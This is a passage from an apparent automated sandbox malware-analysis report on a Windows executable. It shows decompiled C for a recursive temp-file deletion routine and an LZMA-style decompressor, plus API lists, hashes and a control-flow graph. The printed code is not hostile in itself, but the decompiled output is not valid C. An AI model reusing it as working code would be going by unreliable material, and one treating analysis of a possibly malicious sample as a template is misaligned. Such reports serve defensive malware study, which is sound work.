				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058CF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x424008 =  *0x424008 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405CFB(0x421588, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405835(_t72);
					} else {
						lstrcatA(0x421588, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405819( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CFB(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059B3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404FE7(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x424008 =  *0x424008 + 1;
										} else {
											E00404FE7(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405A49(__eflags);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405620(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x421588 - 0x5c;
					if( *0x421588 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405FF6(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004057EE(_t72);
							E004059B3(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404FE7(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404FE7(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405A49(__eflags);
						}
						L33:
						 *0x424008 =  *0x424008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                  0x0040562b
                                                  0x0040562f
                                                  0x00405638
                                                  0x0040563b
                                                  0x0040563e
                                                  0x00405646
                                                  0x00405648
                                                  0x00405649
                                                  0x00000000
                                                  0x00405649
                                                  0x00405658
                                                  0x00405658
                                                  0x0040565b
                                                  0x0040565e
                                                  0x00405672
                                                  0x00405679
                                                  0x0040567e
                                                  0x00405680
                                                  0x00405690
                                                  0x00405682
                                                  0x00405688
                                                  0x00405688
                                                  0x00405695
                                                  0x00405698
                                                  0x004056a3
                                                  0x004056a9
                                                  0x004056ae
                                                  0x004056be
                                                  0x004056c0
                                                  0x004056c6
                                                  0x004056c9
                                                  0x004056cc
                                                  0x00405789
                                                  0x00405789
                                                  0x0040578d
                                                  0x0040578f
                                                  0x0040578f
                                                  0x0040578f
                                                  0x0040578f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004056d2
                                                  0x004056d2
                                                  0x004056db
                                                  0x004056e1
                                                  0x004056e6
                                                  0x004056e9
                                                  0x004056eb
                                                  0x004056ef
                                                  0x004056f1
                                                  0x004056f1
                                                  0x004056ef
                                                  0x004056f4
                                                  0x004056f7
                                                  0x0040570a
                                                  0x0040570c
                                                  0x00405711
                                                  0x00405718
                                                  0x00405730
                                                  0x00405736
                                                  0x0040573c
                                                  0x0040573e
                                                  0x00405763
                                                  0x00405740
                                                  0x00405740
                                                  0x00405744
                                                  0x00405758
                                                  0x00405746
                                                  0x00405749
                                                  0x0040574e
                                                  0x00405750
                                                  0x00405751
                                                  0x00405751
                                                  0x00405744
                                                  0x0040571a
                                                  0x00405720
                                                  0x00405722
                                                  0x00405728
                                                  0x00405728
                                                  0x00405722
                                                  0x00000000
                                                  0x00405718
                                                  0x004056f9
                                                  0x004056fc
                                                  0x004056fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00405700
                                                  0x00405702
                                                  0x00000000
                                                  0x00000000
                                                  0x00405704
                                                  0x00405708
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405768
                                                  0x00405772
                                                  0x00405778
                                                  0x00405778
                                                  0x00405783
                                                  0x00000000
                                                  0x00405783
                                                  0x0040569a
                                                  0x004056a1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405660
                                                  0x00405660
                                                  0x00405662
                                                  0x00405793
                                                  0x00405796
                                                  0x00405799
                                                  0x004057eb
                                                  0x004057eb
                                                  0x004057eb
                                                  0x0040579b
                                                  0x0040579e
                                                  0x004057a9
                                                  0x004057ae
                                                  0x004057b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004057b3
                                                  0x004057b9
                                                  0x004057bf
                                                  0x004057c5
                                                  0x004057c7
                                                  0x00000000
                                                  0x004057e3
                                                  0x004057c9
                                                  0x004057cd
                                                  0x00000000
                                                  0x00000000
                                                  0x004057d2
                                                  0x004057d7
                                                  0x004057d8
                                                  0x00000000
                                                  0x004057d9
                                                  0x004057a0
                                                  0x004057a0
                                                  0x00000000
                                                  0x004057a0
                                                  0x00405668
                                                  0x0040566c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040566c

                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 0040563E
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405688
                                                  • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056A9
                                                  • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056AF
                                                  • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056C0
                                                  • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
                                                  • FindClose.KERNELBASE(?), ref: 00405783
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*$\*.*
                                                  • API String ID: 2035342205-3874973585
                                                  • Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                  • Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
                                                  • Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                  • Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 518 406333-406338 519 4063a9-4063c7 518->519 520 40633a-406369 518->520 523 40699f-4069b4 519->523 521 406370-406374 520->521 522 40636b-40636e 520->522 525 406376-40637a 521->525 526 40637c 521->526 524 406380-406383 522->524 527 4069b6-4069cc 523->527 528 4069ce-4069e4 523->528 529 4063a1-4063a4 524->529 530 406385-40638e 524->530 525->524 526->524 531 4069e7-4069ee 527->531 528->531 534 406576-406594 529->534 532 406390 530->532 533 406393-40639f 530->533 535 4069f0-4069f4 531->535 536 406a15-406a21 531->536 532->533 539 406409-406437 533->539 537 406596-4065aa 534->537 538 4065ac-4065be 534->538 540 406ba3-406bad 535->540 541 4069fa-406a12 535->541 543 4061b7-4061c0 536->543 546 4065c1-4065cb 537->546 538->546 544 406453-40646d 539->544 545 406439-406451 539->545 547 406bb9-406bcc 540->547 541->536 552 4061c6 543->552 553 406bce 543->553 548 406470-40647a 544->548 545->548 549 4065cd 546->549 550 40656e-406574 546->550 551 406bd1-406bd5 547->551 559 406480 548->559 560 4063f1-4063f7 548->560 561 406549-40654d 549->561 562 4066de-4066eb 549->562 550->534 558 406512-40651c 550->558 554 406272-406276 552->554 555 4062e2-4062e6 552->555 556 4061cd-4061d1 552->556 557 40630d-40632e 552->557 553->551 569 406b22-406b2c 554->569 570 40627c-406295 554->570 566 406b31-406b3b 555->566 567 4062ec-406300 555->567 556->547 563 4061d7-4061e4 556->563 557->523 571 406b61-406b6b 558->571 572 406522-406544 558->572 580 4063d6-4063ee 559->580 581 406b3d-406b47 559->581 573 4064aa-4064b0 560->573 574 4063fd-406403 560->574 564 406553-40656b 561->564 565 406b55-406b5f 561->565 562->543 563->553 576 4061ea-406230 563->576 564->550 565->547 566->547 577 406303-40630b 567->577 569->547 579 406298-40629c 570->579 571->547 572->562 575 40650e 573->575 578 4064b2-4064d0 573->578 574->539 574->575 575->558 582 406232-406236 576->582 583 406258-40625a 576->583 577->555 577->557 584 4064d2-4064e6 578->584 585 4064e8-4064fa 578->585 579->554 586 40629e-4062a4 579->586 580->560 581->547 587 406241-40624f GlobalAlloc 582->587 588 406238-40623b GlobalFree 582->588 589 406268-406270 583->589 590 40625c-406266 583->590 591 4064fd-406507 584->591 585->591 592 4062a6-4062ad 586->592 593 4062ce-4062e0 586->593 587->553 594 406255 587->594 588->587 589->579 590->589 590->590 591->573 595 406509 591->595 596 4062b8-4062c8 GlobalAlloc 592->596 597 4062af-4062b2 GlobalFree 592->597 593->577 594->583 599 406b49-406b53 595->599 600 40648f-4064a7 595->600 596->553 596->593 597->596 599->547 600->573
                                                  C-Code - Quality: 98%
                                                  			E00406333() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
